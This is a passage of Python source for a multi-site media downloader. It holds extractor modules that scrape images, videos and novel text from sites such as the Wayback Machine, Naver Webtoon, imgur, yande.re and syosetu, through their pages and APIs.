md5(self.url.encode('utf8')).hexdigest()[:8] self.mode = self.__get_mode() self.title = self.__get_title() def __get_mode(self): for mode in (mode for mode, domain in enumerate(self.domains, start=1) if domain in self.url): return mode return 0 def __get_title(self): def default(): tail = f" ({md5(self.base_url.encode('utf8')).hexdigest()[:8]})" return clean_title(os.path.basename(self.base_url), n=-len(tail)) + tail def twitter(): return '@' + re.findall('twitter.[^/]+/([^/*?]+)', self.url)[0] return [ default, twitter ][self.mode]() class Bitmap: bitmask = [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80] def __init__(self, size=0, cw=None): self.cw = cw self.bitmap = bytearray([False] * ((size + 7) // 8)) def set(self, index): self.bitmap[index // 8] |= self.bitmask[index % 8] def unset(self, index): self.bitmap[index // 8] &= ~self.bitmask[index % 8] def get(self, index): return (self.bitmap[index // 8] & (self.bitmask[index % 8])) != 0 def save(self, path): with open(path, 'wb') as file: file.seek(0) file.write(self.bitmap) def load(self, size, path): with open(path, 'rb') as file: self.bitmap = bytearray(file.read((size + 7) // 8)) return self def update(self, id_, path): self.set(id_) self.save(path) def get_imgs(url, filter_, directory, session=Session(), cw=None): print_ = get_print(cw) if not os.path.exists(directory): os.makedirs(directory) urls_path = os.path.join(directory, '{}.urls'.format(filter_.md5)) bitmap_path = os.path.join(directory, '{}.bitmap'.format(filter_.md5)) count_path = os.path.join(directory, '{}.count'.format(filter_.md5)) for path in [urls_path, bitmap_path, count_path]: if not os.path.exists(path): open(path, 'x').close() with open(count_path) as file: num_complete = (lambda x: int(x) if x else 0)(file.read()) snapshots = WaybackMachineAPI(session, cw).snapshots(url) bitmap = Bitmap(cw=cw).load(len(snapshots), bitmap_path) if num_complete else Bitmap(len(snapshots), cw=cw) base_url = 'https://web.archive.org/web/{}im_/{}' def get_imgs_snapshot(id_, snapshot): @sleep_and_retry @limits(1, 5) def get_soup(): try: return downloader.read_soup(f'https://web.archive.org/web/{snapshot[0]}id_/{snapshot[1]}') except Exception as exception: print_(print_error(exception)[0]) return None def get_imgs_soup(soup): if not soup: return [] def default(): return [base_url.format(snapshot[0], img['src']) for img in soup.find_all('img', src=True)] def twitter(): return [base_url.format(snapshot[0], img['src']) for img in soup.find_all('img', src=True) if 'twimg.com/media/' in img['src']] return [ default, twitter ][filter_.mode]() return id_, get_imgs_soup(get_soup()) with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor: futures = [executor.submit(get_imgs_snapshot, id_, snapshot) for id_, snapshot in enumerate(snapshots) if not bitmap.get(id_)] with open(urls_path, 'a') as urls_file: for future in concurrent.futures.as_completed(futures): id_, urls = future.result() urls_file.writelines([f'{url}\n' for url in urls]) bitmap.update(id_, bitmap_path) num_complete += 1 with open(count_path, 'w') as count_file: count_file.write(str(num_complete)) msg = f'{filter_.title} - {num_complete}' cw.setTitle(msg) if cw else print_(msg) with open(urls_path) as file: urls = set() for url in file.readlines(): urls.update(re.findall(r'^\S+$', url)) os.remove(urls_path) os.remove(bitmap_path) os.remove(count_path) return urls File: src/extractor/luscious_downloader.py #coding:utf8 import downloader import utils from utils import Soup, Downloader, LazyUrl, urljoin, try_n, 
clean_title, get_max_range, json import ree as re import os from translator import tr_ from io import BytesIO import clf2 import errors downloader.REPLACE_UA[r'\.luscious\.net'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36' class LoginRequired(errors.LoginRequired): def __init__(self, *args): super().__init__(*args, method='browser', url='https://members.luscious.net/login/') class Image: def __init__(self, item, referer): self.item = item self.id = str(item['id']) self.referer = referer self.url = LazyUrl(referer, self.get, self) def get(self, url): img = urljoin(url, self.item['url_to_original']) ext = os.path.splitext(img.split('?')[0])[1] self.filename = '{}{}'.format(self.id, ext) return img class Video: id = None def __init__(self, url, title, url_thumb): self.url = url self.title = title ext = os.path.splitext(url.split('?')[0])[1] self.filename = '{}{}'.format(clean_title(title), ext) self.url_thumb = url_thumb self.thumb = BytesIO() downloader.download(self.url_thumb, buffer=self.thumb) class Downloader_luscious(Downloader): type = 'luscious' URLS = ['luscious.net'] MAX_CORE = 4 ACCEPT_COOKIES = [r'(.*\.)?luscious\.net'] @classmethod def fix_url(cls, url): url = url.replace('members.luscious.', 'www.luscious.') return url @classmethod def key_id(cls, url): return '/'.join(url.split('/')[3:]) def read(self): def f(html, browser=None): soup = Soup(html) if soup.find('input', type='password'): browser.show() return False browser.hide() try: get_title(soup) except: return False return True res = clf2.solve(self.url, f=f, cw=self.cw, show=True) self.url = res['url'] soup = Soup(res['html']) if soup.find(class_='http-error-404-page-container'): raise LoginRequired(get_title(soup)) #6912 title = clean_title(get_title(soup)) self.title = tr_('읽는 중... 
{}').format(title) if '/videos/' in self.url: video = get_video(self.url, soup) imgs = [video] self.setIcon(video.thumb) else: imgs = get_imgs(self.url, soup, self.cw) dir = utils.dir(self.type, title, self.cw) names = {} try: for name in os.listdir(dir): id = os.path.splitext(name)[0] names[id] = name except: pass for img in imgs: if img.id in names: url = os.path.join(dir, names[img.id]) else: url = img.url self.urls.append(url) self.title = title# def update(cw, title, imgs): s = '{} {} - {}'.format(tr_('읽는 중...'), title, len(imgs)) if cw is not None: cw.setTitle(s) else: print(s) def get_imgs(url, soup=None, cw=None): if soup is None: html = downloader.read_html(url) soup = Soup(html) title = get_title(soup) n = get_max_range(cw) imgs = [] p = 1 while True: imgs_new, has_next_page = get_imgs_p(url, p) if not imgs_new: break imgs += imgs_new update(cw, title, imgs) p += 1 if len(imgs) >= n or not has_next_page: break return imgs[:n] @try_n(4, sleep=30) def get_imgs_p(url, p=1): id = re.find('/albums/[^/]+?([0-9]+)/', url+'/') print(url, id) #5699 #url_api = 'https://api.luscious.net/graphql/nobatch/?operationName=AlbumListOwnPictures&query=+query+AlbumListOwnPictures%28%24input%3A+PictureListInput%21%29+%7B+picture+%7B+list%28input%3A+%24input%29+%7B+info+%7B+...FacetCollectionInfo+%7D+items+%7B+...PictureStandardWithoutAlbum+%7D+%7D+%7D+%7D+fragment+FacetCollectionInfo+on+FacetCollectionInfo+%7B+page+has_next_page+has_previous_page+total_items+total_pages+items_per_page+url_complete+%7D+fragment+PictureStandardWithoutAlbum+on+Picture+%7B+__typename+id+title+created+like_status+number_of_comments+number_of_favorites+status+width+height+resolution+aspect_ratio+url_to_original+url_to_video+is_animated+position+tags+%7B+category+text+url+%7D+permissions+url+thumbnails+%7B+width+height+size+url+%7D+%7D+&variables=%7B%22input%22%3A%7B%22filters%22%3A%5B%7B%22name%22%3A%22album_id%22%2C%22value%22%3A%22{}%22%7D%5D%2C%22display%22%3A%22position%22%2C%22page%22%3A{}%7D%7D'.format(id, p) url_api = f'https://apicdn.luscious.net/graphql/nobatch/?operationName=AlbumListOwnPictures&query=%2520query%2520AlbumListOwnPictures%28%2524input%253A%2520PictureListInput%21%29%2520%257B%2520picture%2520%257B%2520list%28input%253A%2520%2524input%29%2520%257B%2520info%2520%257B%2520...FacetCollectionInfo%2520%257D%2520items%2520%257B%2520__typename%2520id%2520title%2520description%2520created%2520like_status%2520number_of_comments%2520number_of_favorites%2520moderation_status%2520width%2520height%2520resolution%2520aspect_ratio%2520url_to_original%2520url_to_video%2520is_animated%2520position%2520tags%2520%257B%2520category%2520text%2520url%2520%257D%2520permissions%2520url%2520thumbnails%2520%257B%2520width%2520height%2520size%2520url%2520%257D%2520%257D%2520%257D%2520%257D%2520%257D%2520fragment%2520FacetCollectionInfo%2520on%2520FacetCollectionInfo%2520%257B%2520page%2520has_next_page%2520has_previous_page%2520total_items%2520total_pages%2520items_per_page%2520url_complete%2520%257D%2520&variables=%7B%22input%22%3A%7B%22filters%22%3A%5B%7B%22name%22%3A%22album_id%22%2C%22value%22%3A%22{id}%22%7D%5D%2C%22display%22%3A%22rating_all_time%22%2C%22items_per_page%22%3A50%2C%22page%22%3A{p}%7D%7D' data_raw = downloader.read_html(url_api, referer=url) data = json.loads(data_raw) imgs = [] for item in data['data']['picture']['list']['items']: img = Image(item, url) imgs.append(img) return imgs, data['data']['picture']['list']['info']['has_next_page'] def get_video(url, soup): title = re.find('videos/([^/]+)', url) 
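    # The page's <video> element provides both the media URL (<source src>)
    # and the thumbnail (its poster attribute).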
video = soup.find('video') url = urljoin(url, video.source.attrs['src']) url_thumb = urljoin(url, video['poster']) video = Video(url, title, url_thumb) return video def get_title(soup): return soup.find('h1').text.strip() File: src/extractor/hameln_downloader.py #coding: utf8 import downloader import os import utils from utils import Soup, urljoin, get_text, LazyUrl, try_n, Downloader, lazy, clean_title import ree as re from io import BytesIO from translator import tr_ class Downloader_hameln(Downloader): type = 'hameln' URLS = ['syosetu.org'] MAX_CORE = 2 detect_removed = False ACCEPT_COOKIES = [r'(.*\.)?syosetu\.org'] def init(self): id_ = re.find('/novel/([^/]+)', self.url) if id_ is not None: self.url = 'https://syosetu.org/novel/{}/'.format(id_) @lazy def soup(self): html = read_html(self.url) soup = Soup(html) return soup @lazy def info(self): return get_info(self.url, self.soup) def read(self): for page in get_pages(self.url, self.soup): text = Text(page, len(self.urls)+1) self.urls.append(text.url) self.artist = self.info['artist'] self.title = clean_title('[{}] {}'.format(self.artist, self.info['title']), n=-len('[merged] .txt')) def post_processing(self): names = self.cw.names filename = os.path.join(self.dir, '[merged] {}.txt'.format(self.title)) try: with utils.open(filename, 'wb') as f: f.write(' {}\n\n 作者:{}\n\n\n'.format(self.info['title'], self.artist).encode('utf8')) if self.info['novel_ex']: f.write(self.info['novel_ex'].encode('utf8')) for i, file in enumerate(names): self.cw.pbar.setFormat('[%v/%m] {} [{}/{}]'.format(tr_('병합...'), i, len(names))) with open(file, 'rb') as f_: text = f_.read() f.write(b'\n\n\n\n') f.write(text) finally: self.cw.pbar.setFormat('[%v/%m]') class Text: def __init__(self, page, p): self.page = page self.url = LazyUrl(page.url, self.get, self) self.filename = clean_title('[{:04}] {}'.format(p, page.title), n=-4) + '.txt' def get(self, url): text = read_page(self.page) f = BytesIO() f.write(text.encode('utf8')) f.seek(0) return f class Page: def __init__(self, title, url): self.title = clean_title(title) self.url = url def read_html(url): return downloader.read_html(url, cookies={'over18': 'off'}, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36'}) def get_sss(soup): sss = [ss for ss in soup.findAll('div', class_='ss') if ss.attrs.get('id')!='fmenu'] return sss def get_pages(url, soup=None): if soup is None: html = read_html(url) soup = Soup(html) sss = get_sss(soup) list = sss[-1] pages = [] for tr in list.findAll('tr'): a = tr.find('a') if a is None: continue text =a.text.strip() href = urljoin(url, a.attrs['href']) page = Page(text, href) pages.append(page) return pages @try_n(22, sleep=30) def read_page(page): html = read_html(page.url) soup = Soup(html) text_top = get_text(soup.find('div', id='maegaki')) print(text_top.count('\n')) text_mid = get_text(soup.find('div', id='honbun')) text_bot = get_text(soup.find('div', id='atogaki')) texts = [text for text in (text_top, text_mid, text_bot) if text] story = ''' ──────────────────────────────── '''.join(texts) text = '''──────────────────────────────── ◆ {} ──────────────────────────────── {}'''.format(page.title, story) return text def get_info(url, soup=None): if soup is None: html = read_html(url) soup = Soup(html) info = {} info['artist'] = soup.find('span', {'itemprop':'author'}).text.strip() info['title'] = soup.find('span', {'itemprop':'name'}).text.strip() sss = get_sss(soup) info['novel_ex'] = 
get_text(sss[-2]) return info File: src/extractor/jmana_downloader.py import downloader from utils import Soup, urljoin, Downloader, fix_title, Session, get_print, LazyUrl, clean_title, get_imgs_already, check_alive, try_n, clean_url import ree as re from timee import sleep from translator import tr_ import page_selector import bs4 import clf2 PATTERN = r'jmana[0-9]*.*/(comic_list_title|book)\?book' PATTERN_ALL = r'jmana[0-9]*.*/((comic_list_title|book|bookdetail)\?book|book_by_title\?title)' #6157 PATTERN_ID = '[?&]bookdetailid=([0-9]+)' class Image: def __init__(self, url, page, p): self.url = LazyUrl(page.url, lambda _: url, self) ext = '.jpg' name = '{:04}{}'.format(p, ext) self.filename = '{}/{}'.format(page.title, name) class Page: def __init__(self, title, url): self.title = clean_title(title) self.url = url self.id = int(re.find(PATTERN_ID, url)) class Downloader_jmana(Downloader): type = 'jmana' URLS = ['regex:'+PATTERN_ALL] MAX_CORE = 8 _soup = None def init(self): self.url = clean_url(self.url) self.session = Session() if re.search(PATTERN_ID, self.url): #1799 select = self.soup.find('select', class_='bookselect') for i, op in enumerate(select.findAll('option')[::-1]): if 'selected' in op.attrs: break else: raise Exception('no selected option') for a in self.soup.findAll('a'): url = urljoin(self.url, a.get('href') or '') if re.search(PATTERN, url): break else: raise Exception('list not found') self.url = self.fix_url(url) self._soup = None for i, page in enumerate(get_pages(self.url, self.soup, self.session)): if page.id == int(op['value']): break else: raise Exception('can not find page') self.cw.range_p = [i] @classmethod def fix_url(cls, url): return url @property def soup(self): if self._soup is None: res = clf2.solve(self.url, session=self.session) #4070 html = res['html'] soup = Soup(html) self._soup = soup return self._soup @property def name(self): title = get_title(self.soup) artist = get_artist(self.soup) title = fix_title(self, title, artist) return title def read(self): title = self.name artist = get_artist(self.soup) self.artist = artist for img in get_imgs(self.url, title, self.session, soup=self.soup, cw=self.cw): if isinstance(img, Image): self.urls.append(img.url) else: self.urls.append(img) self.title = self.name def get_title(soup): a = soup.find('a', class_='tit') if a: return a.text.strip() return re.find(r'제목\s*:\s*(.+)', soup.find('a', class_='tit').text, err='no title') def get_artist(soup): return re.find(r'작가\s*:\s*(.+)', soup.text, default='').strip() or 'N/A' @try_n(4, sleep=60) def get_imgs_page(page, referer, session, cw=None): print_ = get_print(cw) sleep(5, cw) #2017 html = downloader.read_html(page.url, referer, session=session) inserted = re.find(r'''var\s*inserted\s*=\s*['"](.*?)['"]''', html) print_('inserted: {}'.format(inserted)) inserted = set(int(i) for i in inserted.split(',')) if inserted else set() soup = Soup(html) view = soup.find(class_='pdf-wrap') imgs = [] for i, img in enumerate(child for child in view.children if isinstance(child, bs4.element.Tag)): src = img.get('data-src') or img.get('src') or '' if i in inserted: print_('remove: {}'.format(src)) continue if not src: continue src = urljoin(page.url, src.strip()) if '/adimg/' in src: print('adimg:', src) continue if '/notice' in src: print('notice:', src) continue img = Image(src, page, len(imgs)) imgs.append(img) return imgs def get_pages(url, soup, session): pages = [] for inner in soup.findAll('div', class_='inner'): a = inner.find('a') if not a: continue href = 
a.attrs.get('href', '') if not re.search(PATTERN_ID, href): continue if a.find('img'): print('skip img', a.attrs.get('href')) continue href = urljoin(url, href) title_page = a.text page = Page(title_page, href) pages.append(page) pages = list(reversed(pages)) return pages @page_selector.register('jmana') def f(url, win): if re.search(PATTERN_ID, url): raise Exception(tr_('목록 주소를 입력해주세요')) session = Session() res = clf2.solve(url, session=session, win=win) #4070 soup = Soup(res['html']) pages = get_pages(url, soup, session) return pages def get_imgs(url, title, session, soup=None, cw=None): print_ = get_print(cw) if soup is None: html = downloader.read_html(url, session=session) soup = Soup(html) pages = get_pages(url, soup, session) print_('pages: {}'.format(len(pages))) pages = page_selector.filter(pages, cw) imgs = [] for i, page in enumerate(pages): check_alive(cw) imgs_already = get_imgs_already('jmana', title, page, cw) if imgs_already: imgs += imgs_already continue imgs += get_imgs_page(page, url, session, cw) if cw is not None: cw.setTitle('{} {} / {} ({} / {})'.format(tr_('읽는 중...'), title, page.title, i + 1, len(pages))) if not imgs: raise Exception('no imgs') return imgs File: src/extractor/navertoon_downloader.py import downloader from utils import Soup, urljoin, Downloader, get_imgs_already, clean_title, get_ext, get_print, errors, check_alive, File, try_n, json import ree as re import page_selector from translator import tr_ import utils class Page: def __init__(self, url, title, p): self.url = url self.title = title self.p = p class File_navertoon(File): type = 'navertoon' format = 'title/page:04;' def __init__(self, info): ext = get_ext(info['url']) d = { 'title': clean_title(info['title']), 'page': info['page'], 'chapterid': re.find(r'[?&]no=([0-9]+)', info['referer']), #6380 } info['name'] = utils.format('navertoon', d, ext) super().__init__(info) class Info: def __init__(self, id, title, artist): self.id = id self.title = title self.artist = artist class Downloader_navertoon(Downloader): type = 'navertoon' URLS = ['comic.naver.com'] MAX_CORE = 8 MAX_SPEED = 4.0 display_name = 'Naver Webtoon' ACCEPT_COOKIES = [r'(.*\.)?naver\.com'] def init(self): self.__info, _ = get_pages(self.url, self.cw) @classmethod def fix_url(cls, url): url = re.sub(r'[?&]page=[0-9]+', '', re.sub(r'[?&]no=[0-9]+', '', url)).replace('m.comic.naver.', 'comic.naver.') url = url.replace('detail.nhn', 'list.nhn').replace('/detail?', '/list?') return url.rstrip('#') @property def name(self): id = self.__info.id title = self.__info.title artist = self.__info.artist title = self.format_title('N/A', id, title, artist, 'N/A', 'N/A', 'Korean', prefix='navertoon_') return clean_title(title) def read(self): self.title = tr_('읽는 중... 
{}').format(self.name) imgs = get_imgs_all(self.url, self.name, cw=self.cw) for img in imgs: self.urls.append(img) self.title = self.name def set_no(url, p): if '&no=' not in url: url = url + f'&no={p}' return url url = re.sub('&no=[0-9]+', f'&no={p}', url) return url def get_id(url): return int(url.lower().split('titleid=')[1].split('&')[0]) def set_page(url, p): if '&page=' in url: url = re.sub('&page=[0-9]+', f'&page={p}', url) else: url += f'&page={p}' return url @try_n(4) def get_pages(url, cw=None): print_ = get_print(cw) url = Downloader_navertoon.fix_url(url).replace('comic.naver.', 'm.comic.naver.') id = get_id(url) print('id:', id) print(url) html = downloader.read_html(url) soup = Soup(html) if soup.find('button', class_='btn_check'): raise errors.LoginRequired() try: info = soup.find('div', class_='area_info') artist = info.find('span', class_='author').text.strip() except Exception as e: print(e) try: title = ('\n').join(soup.find('div', class_='title').text.strip().split('\n')[:-1]).strip() except: title = 'artist not found' raise Exception(title) print_('artist: {}'.format(artist)) title = soup.find('meta', {'property': 'og:title'}).attrs['content'] pages = [] nos = set() for p in range(1, 100): if p == 1: url_page = url else: url_page = set_page(url, p) html = downloader.read_html(url_page) print('read page:', url_page) soup = Soup(html) view = soup.findAll('ul', class_='section_episode_list')[(-1)] for lst in view.findAll('li'): url_page = urljoin(url, lst.find('a').attrs['href']) if 'detail.nhn' not in url_page.lower() and 'detail?' not in url_page.lower(): #3540 continue print_('url_page: {}'.format(url_page)) text = lst.find('strong', class_='title').find('span', class_='name').text.strip() no = int(re.findall('[?&]no=([0-9]+)', url_page)[0]) if no in nos: print('duplicate no: {}'.format(no)) continue nos.add(no) text = '{:04} - {}'.format(no, text) page = Page(url_page, text, p) pages.append(page) btn_next = soup.find('a', class_='btn_next') if btn_next is None or btn_next.attrs['href'] == '#': print('end of page') break info = Info(id, title, artist) return ( info, pages) @page_selector.register('navertoon') @try_n(4) def f(url): url = Downloader_navertoon.fix_url(url) info, pages = get_pages(url) return pages @try_n(6) def get_imgs(page, cw=None): print_ = get_print(cw) html = downloader.read_html(page.url) soup = Soup(html) type_ = re.find('''webtoonType *: *['"](.+?)['"]''', html) print_('type: {}'.format(type_)) imgs = [] if type_ == 'DEFAULT': # https://m.comic.naver.com/webtoon/detail.nhn?titleId=715772 view = soup.find('div', class_='toon_view_lst') for img in view.findAll('img'): img = img.attrs.get('data-src') if not img: continue img = urljoin(page.url, img) img = File_navertoon({'referer': page.url, 'url':img, 'title': page.title, 'page': len(imgs)}) imgs.append(img) elif type_ == 'CUTTOON': # https://m.comic.naver.com/webtoon/detail.nhn?titleId=752803 view = soup.find('div', class_='swiper-wrapper') for div in view.findAll('div', class_='swiper-slide'): if div.parent != view: continue if div.find('div', class_='cut_viewer_last'): print('cut_viewer_last') continue if div.find('div', class_='cut_viewer_recomm'): print('cut_viewer_recomm') continue img = div.find('img') img = img.attrs['data-src'] img = urljoin(page.url, img) img = File_navertoon({'referer': page.url, 'url':img, 'title': page.title, 'page': len(imgs)}) imgs.append(img) elif type_ == 'EFFECTTOON': #2313; https://m.comic.naver.com/webtoon/detail.nhn?titleId=670144 img_base = re.find('''imageUrl 
*: *['"](.+?)['"]''', html) + '/' print('img_base:', img_base) url_api = re.find('''documentUrl *: *['"](.+?)['"]''', html) data_raw = downloader.read_html(url_api, page.url) data = json.loads(data_raw) for img in data['assets']['stillcut'].values(): # ordered in python3.7+ img = urljoin(img_base, img) img = File_navertoon({'referer': page.url, 'url':img, 'title': page.title, 'page': len(imgs)}) imgs.append(img) else: _imgs = re.findall('sImageUrl *: *[\'"](.+?)[\'"]', html) if not _imgs: raise Exception('no imgs') for img in _imgs: img = urljoin(page.url, img) img = File_navertoon({'referer': page.url, 'url':img, 'title': page.title, 'page': len(imgs)}) imgs.append(img) return imgs def get_imgs_all(url, title, cw=None): print_ = get_print(cw) info, pages = get_pages(url, cw) pages = page_selector.filter(pages, cw) imgs = [] for p, page in enumerate(pages): check_alive(cw) imgs_already = get_imgs_already('navertoon', title, page, cw) if imgs_already: imgs += imgs_already continue imgs_new = get_imgs(page, cw) print_('{}: {}'.format(page.title, len(imgs_new))) imgs += imgs_new if cw is not None: cw.setTitle(tr_('읽는 중... {} / {} ({}/{})').format(title, page.title, p + 1, len(pages))) return imgs File: src/extractor/yandere_downloader.py from utils import Downloader, urljoin, clean_title, try_n, check_alive, LazyUrl, get_ext, get_max_range, limits from translator import tr_ import ree as re import downloader from urllib.parse import unquote @try_n(4) @limits(.25) def read_soup(url): return downloader.read_soup(url) class Downloader_yandere(Downloader): type = 'yande.re' URLS = ['yande.re'] MAX_CORE = 4 ACCEPT_COOKIES = [r'(.*\.)?yande\.re'] @classmethod def fix_url(cls, url): url = re.sub(r'([?&])page=[0-9]+&?', r'\1', url).rstrip('?&') pool = re.find('/pool/show/([0-9]+)', url) if pool is not None: url = urljoin(url, '/post?tags=pool%3A{}'.format(pool)) return url def read(self): title = self.get_title(self.url) url = self.url n = get_max_range(self.cw) ids = set() while True: check_alive(self.cw) soup = read_soup(url) for a in soup.find_all('a', class_='thumb'): id_ = re.find(r'/show/([0-9]+)', a['href'], err='no id') if id_ in ids: self.print_(f'dup: {id_}') continue ids.add(id_) img = Image(urljoin(url, a['href']), id_) self.urls.append(img.url) if len(self.urls) >= n: del self.urls[n:] break self.cw.setTitle('{} {} - {}'.format(tr_('읽는 중...'), title, len(self.urls))) next_page = soup.find('a', attrs={'rel':'next'}, href=True) if not next_page: break else: url = urljoin(self.url, next_page['href']) self.title = title def get_id(self, url:str) -> str: id_ = url.split('yande.re%20')[1].split('%20')[0] return int(id_) def get_title(self, url:str) -> str: if "tags=" not in url: raise NotImplementedError('no tags') url_tags = url.split("tags=")[-1].split('+') return clean_title(unquote(" ".join(url_tags))) class Image: def __init__(self, url, id_): self._id = id_ self.url = LazyUrl(url, self.get, self) def get(self, url): soup = read_soup(url) img = soup.find('a', class_='original-file-unchanged') or soup.find('a', class_='original-file-changed') img = urljoin(url, img['href']) ext = get_ext(img) self.filename = clean_title(self._id, n=-len(ext)) + ext return img File: src/extractor/imgur_downloader.py import downloader from utils import Downloader, Soup, try_n, urljoin, get_max_range, clean_title, cut_pair, check_alive, json import ree as re import os from translator import tr_ class Downloader_imgur(Downloader): type = 'imgur' URLS = ['imgur.com'] MAX_CORE = 16 ACCEPT_COOKIES = 
[r'(.*\.)?imgur\.com'] def init(self): self.info = get_info(self.url) @property def id_(self): return re.find('imgur.com/.+?/([0-9a-zA-Z]+)', self.url) @property def name(self): title = self.info['title'] or 'N/A' return clean_title(title, n=100) def read(self): imgs = get_imgs(self.url, self.info, self.cw) for img in imgs: ext = os.path.splitext(img.split('?')[0])[1] if len(imgs) > 1: self.filenames[img] = '{:04}{}'.format(len(self.urls), ext) else: self.filenames[img] = clean_title(self.name, n=-len(ext)) + ext self.urls.append(img) self.single = len(imgs) == 1 self.referer = self.url self.title = '{} (imgur_{})'.format(self.name, self.id_) @try_n(4) def get_info(url): url = url.replace('/gallery/', '/a/') if '/r/' in url and url.split('/r/')[1].strip('/').count('/') == 0: title = re.find(r'/r/([^/]+)', url) info = {} info['title'] = title info['type'] = 'r' else: try: # legacy html = downloader.read_html(url, cookies={'over18':'1'}) s = re.find('image *: *({.+)', html) info_raw = cut_pair(s) except Exception as e: # new print(e) id_ = re.find(r'/a/([0-9a-zA-Z_]+)', url) or re.find(r'/r/[0-9a-zA-Z_]+/([0-9a-zA-Z_]+)', url, err='no id') url_api = 'https://api.imgur.com/post/v1/albums/{}?client_id=546c25a59c58ad7&include=media%2Cadconfig%2Caccount'.format(id_) info_raw = downloader.read_html(url_api, cookies={'over18':'1'}) info = json.loads(info_raw) info['type'] = 'a' return info def get_imgs(url, info=None, cw=None): print('get_imgs', url) if info is None: info = get_info(url) imgs = [] # Range max_pid = get_max_range(cw) if info['type'] == 'a': if 'album_images' in info: # legacy imgs_ = info['album_images']['images'] elif 'media' in info: # new imgs_ = info['media'] else: # legacy imgs_ = [info] for img in imgs_: img_url = img.get('url') # new if not img_url: # legacy hash = img['hash'] ext = img['ext'] img_url = 'https://i.imgur.com/{}{}'.format(hash, ext) if img_url in imgs: continue imgs.append(img_url) elif info['type'] == 'r': urls = set() for p in range(100): url_api = 'https://imgur.com/r/{}/new/page/{}/hit?scrolled'.format(info['title'], p) print(url_api) html = downloader.read_html(url_api, referer=url) soup = Soup(html) c = 0 for post in soup.findAll('div', class_='post'): check_alive(cw) a = post.find('a', class_='image-list-link') url_post = urljoin(url, a.attrs['href']) if url_post in urls: continue urls.add(url_post) c += 1 try: # for r18 images imgs += get_imgs(url_post) except Exception as e: print(e) s = '{} {} ({})'.format(tr_('읽는 중...'), info['title'], len(imgs)) if cw is not None: cw.setTitle(s) else: print(s) if c == 0: print('same; break') break if len(imgs) >= max_pid: break return imgs File: src/extractor/navercafe_downloader.py #coding:utf8 from utils import Downloader, get_print, urljoin, Soup, get_ext, File, clean_title, downloader, re, try_n, errors, json, Session import utils class LoginRequired(errors.LoginRequired): def __init__(self, *args): super().__init__(*args, method='browser', url='https://nid.naver.com/nidlogin.login') class Downloader_navercafe(Downloader): type = 'navercafe' URLS = ['cafe.naver.com'] display_name = 'Naver Cafes' ACCEPT_COOKIES = [r'(.*\.)?naver\.com'] def init(self): self.session = Session() @classmethod def fix_url(cls, url): m = re.find(r'cafe\.naver\.com/([^/?#]+).+?articleid%3D([0-9]+)', url) if m: url = 'https://cafe.naver.com/{}/{}'.format(*m) return url def read(self): info = get_info(self.url, self.session, self.cw) for img in info['imgs']: self.urls.append(img) tail = f' ({info["cafename"]}_{info["id"]})' self.title = 
clean_title(info['title'], n=-len(tail)) + tail @try_n(4) def get_info(url, session, cw=None): print_ = get_print(cw) info = {} html = downloader.read_html(url, 'http://search.naver.com', session=session) soup = Soup(html) if '"cafe_cautionpage"' in html: raise LoginRequired() url_article = re.find(r'''//cafe\.naver\.com/ArticleRead\.nhn\?articleid=[0-9]+[^'"]*''', html, err='no articleid') url_article = urljoin(url, url_article) print_(url_article) articleid = re.find(r'articleid=([0-9]+)', url_article) clubid = re.find(r'clubid(=|%3D)([0-9]+)', url_article)[1] art = re.find(r'art=(.+?)&', url_article) if art: url_api = f'https://apis.naver.com/cafe-web/cafe-articleapi/v2.1/cafes/{clubid}/articles/{articleid}?art={art}&useCafeId=true&requestFrom=A' else: url_api = f'https://apis.naver.com/cafe-web/cafe-articleapi/v2.1/cafes/{clubid}/articles/{articleid}?query=&useCafeId=true&requestFrom=A' j = downloader.read_json(url_api, url_article, session=session) if j['result'].get('errorCode'): #6358 raise LoginRequired(j['result'].get('reason')) info['title'] = j['result']['article']['subject'] info['cafename'] = j['result']['cafe']['url'] info['cafeid'] = clubid info['id'] = articleid html_content = j['result']['article']['contentHtml'] soup = Soup(html_content) imgs = [] pairs = [] for video in soup.findAll('span', class_='_naverVideo'): vid = video.attrs['vid'] key = video.attrs['key'] pairs.append((vid, key)) for script in soup.findAll('script', class_='__se_module_data'): data_raw = script['data-module'] data = json.loads(data_raw)['data'] vid = data.get('vid') if not vid: continue key = data['inkey'] pairs.append((vid, key)) for vid, key in pairs: url_api = f'https://apis.naver.com/rmcnmv/rmcnmv/vod/play/v2.0/{vid}?key={key}' data_raw = downloader.read_html(url_api) data = json.loads(data_raw) fs = data['videos']['list'] fs = sorted(fs, key=lambda f: f['size'], reverse=True) video = Image({'url': fs[0]['source'], 'referer': url_article, 'p': len(imgs)}) imgs.append(video) for img in soup.findAll('img'): img = Image({'url': urljoin(url_article, img['src']), 'referer': url, 'p': len(imgs)}) imgs.append(img) info['imgs'] = imgs return info class Image(File): type = 'navercafe' format = 'page:04;' def __init__(self, info): self._url = info['url'] info['url'] = re.sub(r'[?&]type=[wh0-9]+', '', self._url) #6460 ext = get_ext(info['url']) d = { 'page': info['p'], } info['name'] = utils.format('navercafe', d, ext) super().__init__(info) def alter(self): return self._url File: src/extractor/hf_downloader.py #coding:utf8 import downloader from utils import Soup, urljoin, Session, LazyUrl, Downloader, try_n, clean_title, check_alive import ree as re import os from translator import tr_ URL_ENTER = 'https://www.hentai-foundry.com/site/index?enterAgree=1&size=1550' URL_FILTER = 'https://www.hentai-foundry.com/site/filters' class Image: def __init__(self, url, session): @try_n(4) def f(_): html = downloader.read_html(url, session=session) soup = Soup(html) box = soup.find('section', id='picBox') img = box.find('img') if img is None: raise Exception('No img') onclick = img.attrs.get('onclick', '') if onclick and '.src' in onclick: print('onclick', onclick) img = re.find('''.src *= *['"](.+?)['"]''', onclick) else: img = img.attrs['src'] img = urljoin(url, img) filename = clean_title(os.path.basename(img.split('?')[0])) name, ext = os.path.splitext(filename) # https://www.hentai-foundry.com/pictures/user/DrGraevling/74069/Eversong-Interrogation-pg.-13 if ext.lower() not in ['.bmp', '.png', '.gif', '.jpg', 
